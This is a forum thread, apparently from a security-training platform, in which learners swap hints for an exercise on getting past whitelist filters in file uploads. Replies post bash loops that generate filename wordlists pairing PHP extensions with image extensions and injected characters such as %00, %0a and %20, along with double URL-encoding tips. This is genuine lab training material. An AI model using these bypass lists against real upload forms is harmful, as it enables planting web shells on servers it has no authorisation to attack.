FILE UPLOAD ATTACKS - Whitelist Filters

HTB Content Academy
1

i m stucked here. i got lot of success response like “1.php\x00.png”,“1.php/.jpg”, but i can’t access it. what should i do? could anyone give me a push :face_exhaling:

2 Likes
2

same here … and I get the flag after a lot of tries. here are some tips that helped me to solve it.
1- create a list that combines both blacklist extensions with whitelist characters to bypass the filter, then use the intruder:

exts=('.php' '.php3' '.php4' '.php5' '.php7' '.php8' '.pht' '.phar' '.phpt' '.pgif' '.phtml' '.phtm')
for char in '%20' '%0a' '%00' '%0d0a' '/' '.\\' '.' '…' ':'; do
    for ext in "${exts[@]}"; do
        echo "shell$char$ext.jpg" >> wordlist.txt
        echo "shell$ext$char.jpg" >> wordlist.txt
        echo "shell.jpg$char$ext" >> wordlist.txt
        echo "shell.jpg$ext$char" >> wordlist.txt
    done
done

search for those who give you a download successfully then you need to try those who succeeded and can be executed (NOT ALL OF THEM WILL)

use curl to test the links, browsers will give you the error: file can’t be displayed because it has a mistake. some characters that are used to bypass whitelist filtering should be URL encoded when you request it, so if it is %20 you make it: %2520, and so on.
hope this helps you

3

As people have said before on here. Dont waste time with special characters. Focus on extensions and modify the script accordingly. You can check the allowed file extensions by expecting the page first to inform you on how to modify the script.

for ext in ‘.php’ ‘.phps’ ‘.phar’ ‘.phtml’; do
echo “shell$ext.jpg” >> wordlist1.txt
echo “shell$ext.jpg” >> wordlist1.txt
echo “shell.jpg$ext” >> wordlist1.txt
echo “shell.jpg$ext” >> wordlist1.txt
echo “shell$ext.png” >> wordlist1.txt
echo “shell$ext.png” >> wordlist1.txt
echo “shell.png$ext” >> wordlist1.txt
echo “shell.png$ext” >> wordlist1.txt
echo “shell$ext.jpeg” >> wordlist1.txt
echo “shell$ext.jpeg” >> wordlist1.txt
echo “shell.jpeg$ext” >> wordlist1.txt
echo “shell.jpeg$ext” >> wordlist1.txt
done

2 Likes
4

■■■…thanks :sweat_smile:

5

Hi, I give hints, use the seclist lists and you will see that it accepts the .jpgs. You can use the extension of the previous challenge because you will see that it gives a different error (phar). result shell.extension1.extension2

1 Like